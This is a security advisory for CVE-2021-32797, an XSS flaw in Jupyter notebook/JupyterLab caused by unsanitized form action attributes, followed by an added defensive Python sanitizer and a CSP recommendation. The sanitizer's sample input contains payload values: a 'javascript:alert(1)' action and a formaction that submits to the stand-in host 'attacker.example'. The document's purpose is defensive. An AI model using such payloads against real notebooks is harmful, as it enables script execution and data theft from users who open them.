CVE-2021-32797 – notebook
Package
Manager: pip
Name: notebook
Vulnerable Version: >=0 <5.7.11 || >=6.0.0 <6.4.1
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
EPSS: 0.01143 pctl0.77638
Details
JupyterLab: XSS due to lack of sanitization of the action attribute of an HTML <form>

### Impact
An untrusted notebook can execute code when it is opened. This is a remote code execution, but it requires user action to open the notebook.

### Patches
Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21.

### References
[OWASP Page on Restricting Form Submissions](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html)

### For more information
If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org.

Credit: Guillaume Jeanne from Google
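The advisory names the root cause (an unsanitized `action` attribute on a `<form>` in untrusted notebook HTML) and points at the CSP cheat sheet as the mitigation reference. The following is an added defensive illustration, not the advisory's text and not the notebook project's own sanitizer: it rewrites untrusted HTML so that a form can only submit to a same-origin relative path, and returns the `form-action 'self'` policy value that enforces the same restriction in the browser. It goes slightly beyond the advisory in also covering `formaction` on `<button>`/`<input>`, which overrides the form's `action`. All names and the sample input are constructed for this example.

```python
"""Added example (not from the advisory or the notebook project): neutralise
submit targets on untrusted HTML forms and emit the matching CSP directive."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes that direct where a form submits. `formaction` on a button or
# input overrides the enclosing form's own `action`, so it is covered too.
ACTION_ATTRS = {"form": "action", "button": "formaction", "input": "formaction"}


def is_same_origin_target(value):
    """True if `value` is a relative path (no scheme, no host), so a submit
    stays on the page's own origin. javascript:, data:, //host/... are rejected."""
    if value is None:  # bare `action` attribute: submits to the current URL
        return True
    # Browsers ignore ASCII control characters and surrounding whitespace inside
    # a URL, so drop them before parsing to avoid "java\tscript:" style evasion.
    cleaned = "".join(ch for ch in value if ord(ch) > 0x1F).strip()
    parsed = urlparse(cleaned)
    return parsed.scheme == "" and parsed.netloc == ""


class FormActionSanitizer(HTMLParser):
    """Re-serialises the HTML it receives, dropping unsafe submit targets."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.parts = []
        self.dropped = 0  # number of attributes removed

    def _emit_tag(self, tag, attrs, self_closing):
        kept = []
        for name, value in attrs:  # HTMLParser lowercases tag and attribute names
            if ACTION_ATTRS.get(tag) == name and not is_same_origin_target(value):
                self.dropped += 1
                continue
            # attribute values arrive unescaped; re-escape them on output
            kept.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        inner = " ".join([tag] + kept)
        self.parts.append(f"<{inner}/>" if self_closing else f"<{inner}>")

    def handle_starttag(self, tag, attrs):
        self._emit_tag(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, attrs, True)

    def handle_endtag(self, tag):
        self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(data)

    def handle_entityref(self, name):
        self.parts.append(f"&{name};")

    def handle_charref(self, name):
        self.parts.append(f"&#{name};")

    def handle_comment(self, data):
        pass  # comments carry nothing a rendered notebook needs


def sanitize_form_actions(html):
    """Return (sanitised_html, number_of_attributes_dropped)."""
    parser = FormActionSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.parts), parser.dropped


def form_action_policy():
    """Content-Security-Policy directive that makes the browser enforce the
    same rule even if a sanitiser is bypassed (see the OWASP reference)."""
    return "form-action 'self'"


# Constructed sample: one form with an off-origin/script target, one benign form.
SAMPLE = (
    '<form action="javascript:alert(1)">'
    '<input name="q"><button formaction="//attacker.example/collect">Go</button></form>'
    '<form action="/api/save"><input name="v"></form>'
)

if __name__ == "__main__":
    cleaned, dropped = sanitize_form_actions(SAMPLE)
    print(cleaned)
    print(f"dropped {dropped} unsafe submit target(s); CSP: {form_action_policy()}")
```

The sanitiser is a belt; the CSP directive is the braces: sending `Content-Security-Policy: form-action 'self'` on the page that renders notebook output stops a form from submitting off-origin or to a `javascript:` URL regardless of what the server-side rewrite missed.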
Metadata
Created: 2021-08-23T19:40:22Z
Modified: 2024-11-18T16:26:15Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-4952-p58q-6crx/GHSA-4952-p58q-6crx.json
CWE IDs: ["CWE-75", "CWE-79", "CWE-87"]
Alternative ID: GHSA-4952-p58q-6crx
Finding: F008
Auto approve: 1